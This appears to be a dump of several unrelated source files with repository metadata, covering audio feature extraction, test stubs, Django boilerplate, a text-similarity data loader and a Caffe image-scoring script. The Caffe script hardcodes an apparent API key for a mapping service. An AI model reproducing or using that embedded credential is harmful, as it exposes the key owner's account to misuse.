df=pd.DataFrame(final_f)
df.to_csv('//media/shruti/Data/Internship_data/Experiment/Features/Fire_alarm_proposed_feat.csv',index=None)
### Spectral roll off
# # Approximate maximum frequencies with roll_percent=0.99
# rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr, roll_percent=0.99)
# print(rolloff.shape)
# # Approximate minimum frequencies with roll_percent=0.01
# rolloff_min = librosa.feature.spectral_rolloff(y=y, sr=sr, roll_percent=0.01)
# print(rolloff_min.shape)
##polynomial
# p0 = librosa.feature.poly_features(S=S, order=0)
# p1 = librosa.feature.poly_features(S=S, order=1)
# p2 = librosa.feature.poly_features(S=S, order=2)
# ## zero crossing rate
# ZCR = librosa.feature.zero_crossing_rate(y)
# print(ZCR.shape)
| [
"noreply@github.com"
] | shrutikshirsagar.noreply@github.com |
de74f08ba22e102abd028cba79653660050c469f | 956eb591c3a348047eae942f49d5e3867543552b | /pythonProject/venv/bin/easy_install | c11636af01c7452a5f5d49f3aeac8f8b9c7500c0 | [] | no_license | Diengoumar/stagemam5 | 481bde82a6e53980378b4edf57950162546ea1dc | a4413a04a2fe946727268700af3a81abd1e21feb | refs/heads/main | 2023-08-18T07:58:35.645481 | 2021-10-08T07:43:13 | 2021-10-08T07:43:13 | 402,440,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | #!/home/ubuntu/PycharmProjects/pythonProject/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"oumardieng91@hotmail.fr"
] | oumardieng91@hotmail.fr | |
537360fd185be8ed174625faa99bbb9e72b1f109 | df3c32e5ed8dab63b75c4177e8795fbccba4e294 | /test/test_pythoscope_util.py | 02519409de2463aeede687bb76da44973d2e6c3b | [
"MIT",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | h4ck3rm1k3/pythoscope | 494245fcf7d4e4f3ab4ddc09b9fe3a6559e69a0c | 0cefb34b86e2e81e29c0b93d27e3d4657db79912 | refs/heads/master | 2021-01-09T06:37:47.534212 | 2014-01-18T12:45:02 | 2014-01-18T12:45:02 | 15,382,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,179 | py | import unittest
class TestCompact(unittest.TestCase):
def test_compact(self):
# self.assertEqual(expected, compact(lst))
assert False # TODO: implement your test here
class TestCounted(unittest.TestCase):
def test_counted(self):
# self.assertEqual(expected, counted(objects))
assert False # TODO: implement your test here
class TestCamelize(unittest.TestCase):
def test_camelize(self):
# self.assertEqual(expected, camelize(name))
assert False # TODO: implement your test here
class TestUnderscore(unittest.TestCase):
def test_underscore(self):
# self.assertEqual(expected, underscore(name))
assert False # TODO: implement your test here
class TestPluralize(unittest.TestCase):
def test_pluralize(self):
# self.assertEqual(expected, pluralize(word, count))
assert False # TODO: implement your test here
class TestString2id(unittest.TestCase):
def test_string2id(self):
# self.assertEqual(expected, string2id(string))
assert False # TODO: implement your test here
class TestString2filename(unittest.TestCase):
def test_string2filename(self):
# self.assertEqual(expected, string2filename(string))
assert False # TODO: implement your test here
class TestFileMode(unittest.TestCase):
def test_file_mode(self):
# self.assertEqual(expected, file_mode(base, binary))
assert False # TODO: implement your test here
class TestReadFileContents(unittest.TestCase):
def test_read_file_contents(self):
# self.assertEqual(expected, read_file_contents(filename, binary))
assert False # TODO: implement your test here
class TestWriteContentToFile(unittest.TestCase):
def test_write_content_to_file(self):
# self.assertEqual(expected, write_content_to_file(string, filename, binary))
assert False # TODO: implement your test here
class TestAllOfType(unittest.TestCase):
def test_all_of_type(self):
# self.assertEqual(expected, all_of_type(objects, type))
assert False # TODO: implement your test here
class TestMaxByNotZero(unittest.TestCase):
def test_max_by_not_zero(self):
# self.assertEqual(expected, max_by_not_zero(func, collection))
assert False # TODO: implement your test here
class TestGetNames(unittest.TestCase):
def test_get_names(self):
# self.assertEqual(expected, get_names(objects))
assert False # TODO: implement your test here
class TestMapValues(unittest.TestCase):
def test_map_values(self):
# self.assertEqual(expected, map_values(function, dictionary))
assert False # TODO: implement your test here
class TestEnsureDirectory(unittest.TestCase):
def test_ensure_directory(self):
# self.assertEqual(expected, ensure_directory(directory))
assert False # TODO: implement your test here
class TestGetLastModificationTime(unittest.TestCase):
def test_get_last_modification_time(self):
# self.assertEqual(expected, get_last_modification_time(path))
assert False # TODO: implement your test here
class TestStartsWithPath(unittest.TestCase):
def test_starts_with_path(self):
# self.assertEqual(expected, starts_with_path(path, prefix))
assert False # TODO: implement your test here
class TestExtractSubpath(unittest.TestCase):
def test_extract_subpath(self):
# self.assertEqual(expected, extract_subpath(path, prefix))
assert False # TODO: implement your test here
class TestDirectoriesUnder(unittest.TestCase):
def test_directories_under(self):
# self.assertEqual(expected, directories_under(path))
assert False # TODO: implement your test here
class TestFindfirst(unittest.TestCase):
def test_findfirst(self):
# self.assertEqual(expected, findfirst(pred, seq))
assert False # TODO: implement your test here
class TestFlatten(unittest.TestCase):
def test_flatten(self):
# self.assertEqual(expected, flatten(lst))
assert False # TODO: implement your test here
# Placeholder test cases, one TestCase per function under test.  Each body
# deliberately fails with `assert False` until a real test is written; the
# commented-out assertEqual above each failure shows the intended call shape.
class TestUnion(unittest.TestCase):
    def test_union(self):
        # self.assertEqual(expected, union(*sets))
        assert False # TODO: implement your test here
class TestKeyForValue(unittest.TestCase):
    def test_key_for_value(self):
        # self.assertEqual(expected, key_for_value(dictionary, value))
        assert False # TODO: implement your test here
class TestGetGeneratorFromFrame(unittest.TestCase):
    def test_get_generator_from_frame(self):
        # self.assertEqual(expected, get_generator_from_frame(frame))
        assert False # TODO: implement your test here
class TestIsGeneratorCode(unittest.TestCase):
    def test_is_generator_code(self):
        # self.assertEqual(expected, is_generator_code(code))
        assert False # TODO: implement your test here
class TestGeneratorHasEnded(unittest.TestCase):
    def test_generator_has_ended(self):
        # self.assertEqual(expected, generator_has_ended(generator))
        assert False # TODO: implement your test here
class TestIsMethodWrapper(unittest.TestCase):
    def test_is_method_wrapper(self):
        # self.assertEqual(expected, is_method_wrapper(obj))
        assert False # TODO: implement your test here
class TestGetSelfFromMethod(unittest.TestCase):
    def test_get_self_from_method(self):
        # self.assertEqual(expected, get_self_from_method(method))
        assert False # TODO: implement your test here
class TestCompileWithoutWarnings(unittest.TestCase):
    def test_compile_without_warnings(self):
        # self.assertEqual(expected, compile_without_warnings(stmt))
        assert False # TODO: implement your test here
class TestCallersName(unittest.TestCase):
    def test_callers_name(self):
        # self.assertEqual(expected, callers_name())
        assert False # TODO: implement your test here
class TestTypeNames(unittest.TestCase):
    def test_type_names(self):
        # self.assertEqual(expected, type_names(types))
        assert False # TODO: implement your test here
class TestAssertArgumentType(unittest.TestCase):
    def test_assert_argument_type(self):
        # self.assertEqual(expected, assert_argument_type(obj, expected_type))
        assert False # TODO: implement your test here
class TestQuotedBlock(unittest.TestCase):
    def test_quoted_block(self):
        # self.assertEqual(expected, quoted_block(text))
        assert False # TODO: implement your test here
class TestClassOf(unittest.TestCase):
    def test_class_of(self):
        # self.assertEqual(expected, class_of(obj))
        assert False # TODO: implement your test here
class TestClassName(unittest.TestCase):
    def test_class_name(self):
        # self.assertEqual(expected, class_name(obj))
        assert False # TODO: implement your test here
class TestModuleName(unittest.TestCase):
    def test_module_name(self):
        # self.assertEqual(expected, module_name(obj))
        assert False # TODO: implement your test here
class TestModulePathToName(unittest.TestCase):
    def test_module_path_to_name(self):
        # self.assertEqual(expected, module_path_to_name(module_path, newsep))
        assert False # TODO: implement your test here
class TestLastTraceback(unittest.TestCase):
    def test_last_traceback(self):
        # self.assertEqual(expected, last_traceback())
        assert False # TODO: implement your test here
class TestLastExceptionAsString(unittest.TestCase):
    def test_last_exception_as_string(self):
        # self.assertEqual(expected, last_exception_as_string())
        assert False # TODO: implement your test here
class TestRegexpFlagsAsString(unittest.TestCase):
    def test_regexp_flags_as_string(self):
        # self.assertEqual(expected, regexp_flags_as_string(flags))
        assert False # TODO: implement your test here
class TestLoadPickleFrom(unittest.TestCase):
    def test_load_pickle_from(self):
        # self.assertEqual(expected, load_pickle_from(path))
        assert False # TODO: implement your test here
if __name__ == '__main__':
    unittest.main()
| [
"jamesmikedupont@gmail.com"
] | jamesmikedupont@gmail.com |
f8a9873f17233f7490661e29d2e14c7adf1359b9 | 5bbf56dec57fdba4b6c32d679d8216fd2c364eb2 | /datastruct/dictsort.py | 8fb59915a1c2efed40ae9c2070a78e5cbc2754de | [] | no_license | yiwenzi/python | 394d5b744422e33409145bcc0245774e8c0d1933 | 56c1f2ea710514a36daf0b314ad36abbc9b0444e | refs/heads/master | 2020-03-12T08:10:40.552943 | 2018-04-24T14:54:37 | 2018-04-24T14:54:37 | 130,521,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | # coding=utf-8
from random import randint
__author__ = 'hunter'
# Demo (Python 2): three ways to sort a dict of random scores keyed 'a'..'g'.
d = {x: randint(60, 100) for x in 'abcdefg'}
# Sorting the dict directly iterates its keys, so this orders by key only.
print sorted(d)
# Rebuild as (value, key) pairs with zip, so sorted() orders by value first.
d2 = sorted(zip(d.itervalues(), d.iterkeys()))
print d2
# Sort the (key, value) items by value via a lambda sort key.
d3 = sorted(d.items(), key=lambda x: x[1])
print d3
| [
"hello.jiajun@qq.com"
] | hello.jiajun@qq.com |
f5242073f0bfa465e975bd513bb740d7394140f9 | 6d287cd00d4df706f0e0d93f21c49be9632312cf | /Weekly-Contest/215/5603-Determine-if-Two-Strings-Are-Close.py | 3806f2eae68e258ce3d412b38ac1301891c06cae | [] | no_license | csyhhu/LeetCodePratice | eba799a3b74b6ef7b011bf1500c386ce37be6de9 | 9366805ba480bb234d6bc63cea098b6e41539d35 | refs/heads/master | 2023-07-10T22:51:58.908904 | 2023-06-21T02:46:07 | 2023-06-21T02:46:07 | 204,811,835 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,178 | py | def closeStrings(word1: str, word2: str):
"""
1) Swap any two existing characters
2) Transform every occurrence of one existing character into another existing character, and do the same with the other character.
:param word1:
:param word2:
:return:
"""
if len(word1) != len(word2):
return False
word1_dict = dict()
for c in word1:
if c in word1_dict:
word1_dict[c] += 1
else:
word1_dict[c] = 1
word2_dict = dict()
for c in word2:
if c in word2_dict:
word2_dict[c] += 1
else:
word2_dict[c] = 1
if len(word1_dict) != len(word2_dict):
return False
if set(word1_dict.keys()) != set(word2_dict.keys()):
return False
for start, n_start in word1_dict.items():
for end, n_end in word2_dict.items():
if n_start == n_end:
word2_dict.pop(end)
break
if len(word2_dict) == 0:
return True
else:
return False
# Commented-out sample case: "cabbba" vs "abbccc" (expected output: True).
# word1 = "cabbba"
# word2 = "abbccc"
# print(closeStrings(word1, word2))
word1 = "usu"
word2 = "aax"
# "usu" and "aax" use different character sets, so this prints False.
print(closeStrings(word1, word2))
"schen025@e.ntu.edu.sg"
] | schen025@e.ntu.edu.sg |
948699f4f43166001accf08ca41b50bc491cccb7 | 4d363dff48515c6a00ca78903ff2e824c64e9098 | /qaPairsRelationClassification/DeepSiameseNet/utils/input_helpers.py | e28194f26a01ff475a95a0cea636ef7fccef480a | [
"Apache-2.0",
"MIT"
] | permissive | lrpopeyou/pynlp | 3b0e0d54be87d7de0b447f6b6e0e1b801adb1012 | 0f1aa73f8c4bd3faba18dbb6e402d251e308bb50 | refs/heads/master | 2022-04-05T17:55:22.511021 | 2019-12-13T09:54:27 | 2019-12-13T09:54:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,582 | py | import gc
import warnings
from random import random
import numpy as np
from utils.preprocess import MyVocabularyProcessor
class InputHelper(object):
    """Loads TSV sentence-pair data and builds/restores vocabularies and
    shuffled batches for training/evaluating the siamese text model."""
    # Cache of pre-trained embeddings (cleared by deletePreEmb).
    pre_emb = dict()
    # Lazily restored vocabulary processor (see getVocab).
    vocab_processor = None
    def getVocab(self, vocab_path, max_document_length, filter_h_pad):
        """Lazily restore (and cache) a vocabulary processor from vocab_path."""
        if self.vocab_processor is None:
            print('locading vocab_')
            vocab_processor = MyVocabularyProcessor(max_document_length - filter_h_pad, min_frequency=0)
            self.vocab_processor = vocab_processor.restore(vocab_path)
        return self.vocab_processor
    def deletePreEmb(self):
        """Drop the cached pre-trained embeddings and force a GC pass."""
        self.pre_emb = dict()
        gc.collect()
    def getTsvData(self, filepath):
        """Read word-based pairs from a TSV file: text1 TAB text2 TAB label.

        The order of the two texts is randomized per line so the model does
        not learn a positional bias.  Returns aligned arrays (x1, x2, y).
        NOTE(review): the guard skips rows with fewer than 2 fields, but
        l[2] is read below -- a 2-field row raises IndexError; confirm the
        input always has 3 columns.  Also opens with the platform default
        encoding, unlike the utf-8 readers below -- verify this is intended.
        """
        print("Loading training data from " + filepath)
        x1 = []
        x2 = []
        y = []
        # positive samples from file
        for line in open(filepath):
            l = line.strip().split("\t")
            if len(l) < 2:
                continue
            if random() > 0.5:
                x1.append(l[0].lower())
                x2.append(l[1].lower())
            else:
                x1.append(l[1].lower())
                x2.append(l[0].lower())
            y.append(int(l[2]))
        return np.asarray(x1), np.asarray(x2), np.asarray(y)
    def getTsvDataCharBased(self, filepath):
        """Read character-based pairs from a utf-8 TSV file.

        Labels are kept as strings (unlike getTsvData).  Negative pairs
        (label "0") are also collected into side lists, which feed only the
        commented-out augmentation below and are otherwise unused.
        """
        print("Loading training data from " + filepath)
        x1 = []
        x2 = []
        y = []
        x1_negative = []
        x2_negative = []
        y_negative = []
        # positive samples from file
        for line in open(filepath, encoding="utf-8"):
            l = line.strip().split("\t")
            if len(l) != 3:
                print(l)
                continue
            if l[2] == "0":
                x1_negative.append(l[0].lower())
                x2_negative.append(l[1].lower())
                y_negative.append(l[2])
            # Randomize pair order, same rationale as getTsvData.
            if random() > 0.5:
                x1.append(l[0].lower())
                x2.append(l[1].lower())
                y.append(l[2])  # np.array([0,1]))
            else:
                x1.append(l[1].lower())
                x2.append(l[0].lower())
                y.append(l[2])  # np.array([0,1]))
        # generate random negative samples
        # combined = np.asarray(x1 + x2)
        # shuffle_indices = np.random.permutation(np.arange(len(combined)))
        # combined_shuff = combined[shuffle_indices]
        # for i in range(len(combined)):
        # x1.append(combined[i])
        # x2.append(combined_shuff[i])
        # y.append(0) # np.array([1,0]))
        # for i in range(len(x1_negative)):
        # x1.append(x1_negative[i])
        # x2.append(x2_negative[i])
        # y.append(y_negative[i])
        return np.asarray(x1), np.asarray(x2), np.asarray(y)
    def getTsvTestData(self, filepath):
        """Read labelled test data: label TAB text1 TAB text2 (utf-8)."""
        print("Loading testing/labelled data from " + filepath)
        x1 = []
        x2 = []
        y = []
        # positive samples from file
        for line in open(filepath, encoding="utf-8"): # , encoding="utf-8"
            l = line.strip().split("\t")
            if len(l) < 3:
                continue
            x1.append(l[1].lower())
            x2.append(l[2].lower())
            y.append(int(l[0])) # np.array([0,1]))
        return np.asarray(x1), np.asarray(x2), np.asarray(y)
    def batch_iter(self, data, batch_size, num_epochs, shuffle=True):
        """
        Generates a batch iterator for a dataset.

        Reshuffles once per epoch when `shuffle` is True.
        NOTE(review): num_batches_per_epoch is len//batch_size + 1, so when
        data_size is an exact multiple of batch_size the final yielded batch
        is empty -- confirm downstream tolerates zero-length batches.
        """
        data = np.asarray(data)
        data_size = len(data)
        num_batches_per_epoch = int(len(data) / batch_size) + 1
        for epoch in range(num_epochs):
            # Shuffle the data at each epoch
            if shuffle:
                shuffle_indices = np.random.permutation(np.arange(data_size))
                shuffled_data = data[shuffle_indices]
            else:
                shuffled_data = data
            for batch_num in range(num_batches_per_epoch):
                start_index = batch_num * batch_size
                end_index = min((batch_num + 1) * batch_size, data_size)
                yield shuffled_data[start_index:end_index]
    def dumpValidation(self, x1_text, x2_text, y, shuffled_index, dev_idx, i):
        """Write the dev split (label TAB text1 TAB text2 per line) to disk.

        NOTE(review): the output path is a hardcoded absolute Windows path,
        which breaks on any other machine -- should be made configurable.
        """
        print("dumping dev " + str(i))
        x1_shuffled = x1_text[shuffled_index]
        x2_shuffled = x2_text[shuffled_index]
        y_shuffled = y[shuffled_index]
        # dev_idx is negative, so [dev_idx:] takes the tail of the shuffle.
        x1_dev = x1_shuffled[dev_idx:]
        x2_dev = x2_shuffled[dev_idx:]
        y_dev = y_shuffled[dev_idx:]
        del x1_shuffled
        del y_shuffled
        with open('F:\python_work\siamese-lstm-network\deep-siamese-text-similarity\\atec_data\dev.txt', 'w', encoding="utf-8") as f:
            for text1, text2, label in zip(x1_dev, x2_dev, y_dev):
                f.write(str(label) + "\t" + text1 + "\t" + text2 + "\n")
            # Redundant: the `with` block already closes the file.
            f.close()
        del x1_dev
        del y_dev
    # Data Preparatopn
    # ==================================================
    def getDataSets(self, training_paths, max_document_length, percent_dev, batch_size):
        """Build vocab over both text sides, vectorize, shuffle (seed 131)
        and split off percent_dev% as the dev set.

        Returns (train_set, dev_set, vocab_processor, sum_no_of_batches),
        where each set is an (x1, x2, y) tuple.  Also dumps the vocabulary
        to ./voc and the dev split via dumpValidation.
        """
        x1_text, x2_text, y = self.getTsvDataCharBased(training_paths)
        # Build vocabulary
        print("Building vocabulary")
        vocab_processor = MyVocabularyProcessor(max_document_length, min_frequency=0)
        vocab_processor.fit_transform(np.concatenate((x2_text, x1_text), axis=0))
        f = open("./voc", "w",encoding="utf-8")
        for i in range(len(vocab_processor.vocabulary_)):
            f.write(vocab_processor.vocabulary_.reverse(i)+"\n")
        print("Length of loaded vocabulary ={}".format(len(vocab_processor.vocabulary_)))
        sum_no_of_batches = 0
        x1 = np.asarray(list(vocab_processor.transform(x1_text)))
        x2 = np.asarray(list(vocab_processor.transform(x2_text)))
        # Randomly shuffle data
        # Fixed seed keeps the train/dev split reproducible across runs.
        np.random.seed(131)
        shuffle_indices = np.random.permutation(np.arange(len(y)))
        x1_shuffled = x1[shuffle_indices]
        x2_shuffled = x2[shuffle_indices]
        y_shuffled = y[shuffle_indices]
        # Negative index marking where the dev tail begins.
        dev_idx = -1 * len(y_shuffled) * percent_dev // 100
        del x1
        del x2
        # Split train/test set
        self.dumpValidation(x1_text, x2_text, y, shuffle_indices, dev_idx, 0)
        # TODO: This is very crude, should use cross-validation
        x1_train, x1_dev = x1_shuffled[:dev_idx], x1_shuffled[dev_idx:]
        x2_train, x2_dev = x2_shuffled[:dev_idx], x2_shuffled[dev_idx:]
        y_train, y_dev = y_shuffled[:dev_idx], y_shuffled[dev_idx:]
        print("Train/Dev split for {}: {:d}/{:d}".format(training_paths, len(y_train), len(y_dev)))
        sum_no_of_batches = sum_no_of_batches + (len(y_train) // batch_size)
        train_set = (x1_train, x2_train, y_train)
        dev_set = (x1_dev, x2_dev, y_dev)
        gc.collect()
        return train_set, dev_set, vocab_processor, sum_no_of_batches
    def getTestDataSet(self, data_path, vocab_path, max_document_length):
        """Vectorize a labelled test file using a previously saved vocabulary.

        Returns (x1, x2, y) numpy arrays of token-id sequences and labels.
        """
        x1_temp, x2_temp, y = self.getTsvTestData(data_path)
        # Build vocabulary
        vocab_processor = MyVocabularyProcessor(max_document_length, min_frequency=0)
        vocab_processor = vocab_processor.restore(vocab_path)
        # f = open("./vocab_new", "w", encoding="utf-8")
        # for i in range(len(vocab_processor.vocabulary_)):
        # f.write(vocab_processor.vocabulary_.reverse(i) + "\n")
        x1 = np.asarray(list(vocab_processor.transform(x1_temp)))
        x2 = np.asarray(list(vocab_processor.transform(x2_temp)))
        # Randomly shuffle data
        del vocab_processor
        gc.collect()
        return x1, x2, y
| [
"900326yang"
] | 900326yang |
e7e0b4218728f2b71bc3f8d0aa25460859bac071 | 0345efcc297ac6bd4f4c0010290d10a4d1d19fb8 | /app/migrations/0003_auto_20200926_2236.py | 79a9ffe8cab74852bf6911cbeb2498a4dc013507 | [] | no_license | meat9/rest_bot | 953f412f6ac13a4149424bd5fae53e70c1c0a40b | 6f735a415d4b1a056e89b33b711f4fb7f533a2b2 | refs/heads/master | 2022-12-24T22:04:00.680688 | 2020-10-06T16:54:52 | 2020-10-06T16:54:52 | 298,871,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | # Generated by Django 3.1.1 on 2020-09-26 19:36
from django.db import migrations, models
import gsheets.mixins
import uuid
class Migration(migrations.Migration):
    """Auto-generated schema migration: replaces the Person model with Test.

    NOTE(review): generated by Django (see header); prefer creating a
    follow-up migration over hand-editing these operations.
    """
    # Must run after the migration that introduced Person.
    dependencies = [
        ('app', '0002_person'),
    ]
    operations = [
        migrations.CreateModel(
            name='Test',
            fields=[
                # Client-generated UUID primary key stored as text.
                ('guid', models.CharField(default=uuid.uuid4, max_length=255, primary_key=True, serialize=False)),
                ('test_field', models.CharField(max_length=127)),
            ],
            # SheetSyncableMixin comes from the gsheets package (see imports).
            bases=(gsheets.mixins.SheetSyncableMixin, models.Model),
        ),
        migrations.DeleteModel(
            name='Person',
        ),
    ]
| [
"iiidonaldiii@gmail.com"
] | iiidonaldiii@gmail.com |
3ecfcd1b407d0620a5577195224b57ab70cc47e6 | 8f6fa264770a48a4bc1563211baa3fda37e2fbfa | /AD_ROI/asgi.py | 6968051c25f067f237205620d09c3cf2c2ac02b1 | [] | no_license | So-fin/Django-ROI-Calculator-Application-Development-Project | 45f1925dfadf9800aedefa3b3d5fa8470a7da0c1 | 41bb6f89e70d0ffd635b0d99f2bc071ded43ac63 | refs/heads/main | 2023-02-12T18:39:04.390427 | 2021-01-10T11:17:53 | 2021-01-10T11:17:53 | 328,362,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for AD_ROI project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings before the app object is created;
# an already-exported DJANGO_SETTINGS_MODULE wins over this default.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'AD_ROI.settings')
# Module-level ASGI callable that servers (uvicorn/daphne) import.
application = get_asgi_application()
| [
"sofinwadhwaniya18@gnu.ac.in"
] | sofinwadhwaniya18@gnu.ac.in |
7cca7e78bf221433446d462997bcc94b90d386ee | aca539099faaf7532848cfe61aa8dafcaecddea0 | /base/__init__.py | 970590f7517b8aaf5080bda5582a5e532ea04562 | [] | no_license | geo000/MTL_homoscedastic_SRB | 824c37ae23da275af2d993657fb43d92cf548414 | 6137c334d754394b58e007d419f9d699b35bad35 | refs/heads/main | 2023-05-13T00:32:39.883337 | 2021-05-25T08:29:20 | 2021-05-25T08:29:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | from .model import SegmentationModel
from .modules import (
Conv2dReLU,
Attention,
)
from .heads import (
SegmentationHead,
ClassificationHead,
AUX_edgehead,
AUX_SegmentationHead
) | [
"noreply@github.com"
] | geo000.noreply@github.com |
775a116478124bcea5a3d5aabcbc37540ba42801 | c950955296f5989ad9db585af2a87f1d1842395e | /positions_explorer/manage.py | 377a74752f218f145c234d90af92508c39ac785f | [] | no_license | Contexte/eu-hackathon | d6dabdf160846f9d38d81d58d0823122cfc569a7 | ed03aeea75be404dfc56a5fce1d38c594f202f99 | refs/heads/master | 2021-01-22T08:27:47.742154 | 2014-12-03T12:05:16 | 2014-12-03T12:05:22 | 27,421,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "positions_explorer.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"adelaby@contexte.com"
] | adelaby@contexte.com |
bc0eb24f243dcd89f945e8d32010f60e4d419698 | e80a89f5892bb0d0d46b9811b74057ab730e4aca | /xml_to_csv.py | bc75f5bc8871ed4da218d1bcdabc1733690b96c3 | [] | no_license | kaletap/stack | db8984f486acdaa9494606b96cde1ad704b92f8a | e15ada3d148dba1948db24fbb27658bb6e55c662 | refs/heads/master | 2020-04-10T23:59:28.146592 | 2019-02-13T20:03:00 | 2019-02-13T20:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,206 | py | #!/usr/bin/env python
import xml.etree.cElementTree as et
import os
import pandas as pd
def save_xml_as_csv(dataset_name):
"""Saves all tables of dataset as csv's"""
data_path = os.path.join("data", dataset_name + ".stackexchange.com")
if not os.path.exists(data_path):
print("Check whether path {} exists!".format(data_path))
for table_name in os.listdir(data_path):
table_path = os.path.join(data_path, table_name)
if table_path.endswith('xml'):
# Parsing XML
parsedXML = et.parse(table_path)
root = parsedXML.getroot()
# Saving data frame as a csv
df = pd.DataFrame([row.attrib for row in root])
save_path = os.path.splitext(table_path)[0] + ".csv"
df.to_csv(save_path)
print("Saved {} from {}".format(table_name, dataset_name))
def main():
""" Napisz w argumencie jaki zbiór chcesz przerobić na csv
Dane musza byc wypakowane w folderze data.
Pliki .csv zapisuja sie w folderze gdzie znajduja sie pliki .xml
Moze sie troche mielic."""
save_xml_as_csv("movies")
save_xml_as_csv("writers")
if __name__ == "__main__":
main()
| [
"kaletap@student.mini.pw.edu.pl"
] | kaletap@student.mini.pw.edu.pl |
82e66eb8027f06c7c8b3a2130383eee0433965f7 | 5cc3334518c73a7de57f33a9b79ab4dd38693163 | /test_tf.py | 011ea6bf5e61e9340ac852d40abf25af2693ab64 | [] | no_license | arashdn/sof-expert-finding-ml | 0affecc06db78e96a55c376f65f53aaf780d1e5f | de8f6b64bf666d7d4fa3a6abd24354d7d8000f6f | refs/heads/master | 2021-01-19T18:59:02.731049 | 2018-01-20T11:02:40 | 2018-01-20T11:02:40 | 88,392,949 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | # import tensorflow as tf
#
# # v1 = tf.Variable([[1,2,3]], name="v1")
# # v2 = tf.Variable([[4],[5],[6]], name="v2")
# # ...
# # # Add an op to initialize the variables.
# # init_op = tf.global_variables_initializer()
# #
# # # Add ops to save and restore all the variables.
# # saver = tf.train.Saver()
#
# # with tf.Session() as sess:
# # sess.run(init_op)
# # # Do some work with the model.
# # v2 = tf.matmul(v1,v2)
# #
# # # print(v2.eval())
# #
# # # Save the variables to disk.
# # save_path = saver.save(sess, "./model.ckpt")
# # print("Model saved in file: %s" % save_path)
# #
#
# # Create some variables.
# v1 = tf.Variable([[1, 2, 3]], name="v1")
# v2 = tf.Variable([0], name="v2")
#
# # Add ops to save and restore all the variables.
# saver = tf.train.Saver()
#
# # Later, launch the model, use the saver to restore variables from disk, and
# # do some work with the model.
# with tf.Session() as sess:
# # Restore variables from disk.
# saver.restore(sess, "./model.ckpt")
# print("Model restored.")
#
# print(v2.eval())
import numpy as np
# Convert the saved NumPy array to a plain-text file for inspection.
a = np.load("./save/wp.npy")
np.savetxt("./save/wp22.txt",a)
| [
"arash@dargahi.org"
] | arash@dargahi.org |
08dd02119e649205f4935ee844d8221d52578ab9 | e266a4c966657d3f0d7a6847c69ef39828c8a8df | /caffe-deeplearning/sceneTagging/finetune_setup/train01/safe_val.py | 2da251dbe6a0d224cd8b51383764062988211a4d | [] | no_license | patrickbochen/Carmera | 26d8251b23a772441825e8aec109675a39bba27d | 404c2ace3703fe0d6bb17adeaaf6c8a94ff055ed | refs/heads/master | 2021-01-20T22:31:14.708758 | 2016-08-03T18:27:08 | 2016-08-03T18:27:08 | 64,784,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,914 | py | #Validation testing file on 'safe' tag against MIT streetscores
import csv #csv file reader
import random
import os
from carmera import Carmera #Carmea module
#Local machine setup
# NOTE(review): this API key is committed in source control -- rotate it and
# load it from an environment variable instead.
cm = Carmera(api_key="ff779518b57c98017d46617830829c91e731c302")
#cm.url_base = "http://api-staging.carmera.co" Dont need this, only for staging
im = cm.Image()
#Set up path for caffe
import sys
# TODO: confirm where downloaded images actually land relative to caffe_root.
caffe_root = '../../../../' # this file should be run from {caffe_root}/file/path (aka caffe)
sys.path.insert(0, caffe_root + 'python')
import numpy as np #to run through network
import caffe
# If you get "No module named _caffe", either you have not built pycaffe or you have the wrong path.
#Caffe network setup
#---------------------------------------------------------------------------------------------
#Set up caffe
# Build the network once at module load; everything below is reused for
# every image scored by runThroughNetwork.
caffe.set_mode_cpu()
#caffe.set_device(0)
#Set up model - Change this for different models
# model_def = caffe_root + 'models/finetune_scene/train01/deploy.prototxt'
# model_weights = caffe_root + 'models/finetune_scene/train01/snapshots_iter_100000.caffemodel'
model_def = caffe_root + 'Carmera-SceneDetection/createTrain/finetune/train01/deploy.prototxt'
model_weights = caffe_root + 'Carmera-SceneDetection/createTrain/finetune/train01/snapshots_iter_100000.caffemodel'
#Set up network = Do once then dont need to mess with ever again (build network once per run)
net = caffe.Net(model_def, # defines the structure of the model
                model_weights, # contains the trained weights
                caffe.TEST) # use test mode (e.g., don't perform dropout)
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# set the size of the input (we can skip this if we're happy
# with the default; we can also change it later, e.g., for different batch sizes)
net.blobs['data'].reshape(50, # batch size
                          3, # 3-channel (BGR) images
                          227, 227) # image size is 227x227
#File names and locations setup
#---------------------------------------------------------------------------------------------
#File setup
